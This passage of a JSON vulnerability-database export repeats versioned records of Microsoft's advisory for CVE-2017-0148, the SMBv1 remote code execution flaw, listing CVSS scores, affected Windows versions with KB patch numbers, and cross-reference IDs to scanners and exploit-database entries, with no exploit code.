["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-05T18:46:16", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-05T18:46:16", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012214", "KB3210720", "KB3210721", "KB3212646", "KB4013198", "KB4013429", "KB4012217", "KBMS16-110, 3187754", "KB4012216", "KB3205401", "KB4012212", "KB4012606", "KB4012598", "KB3205409", "KB4012215", "KB3177186", "KB4012213", "KB3213986"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-05T18:46:16", "differentElements": ["msAffectedSoftware"], "edition": 13}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-05T20:48:26", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-27752"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-05T20:48:26", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-05T20:48:26", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013198", "KB4013429", "KB3210720", "KB4012215", "KB3213986", "KB4012217", "KB4012598", "KB3205409", "KB3177186", "KB4012606", "KB4012214", "KB4012212", "KB3210721", "KB4012216", "KB3205401", "KB3212646", "KB4012213", "KBMS16-110, 3187754"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-05T20:48:26", "differentElements": ["msAffectedSoftware"], "edition": 14}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-06T10:43:29", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27752"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-06T10:43:29", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-06T10:43:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KB4012606", "KB4012598", "KB4012215", "KB4012217", "KB3213986", "KB3205401", "KB3177186", "KB3205409", "KB4012213", "KBMS16-110, 3187754", "KB4012216", "KB4013198", "KB4012212", "KB3210720", "KB4012214", "KB3212646", "KB3210721"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 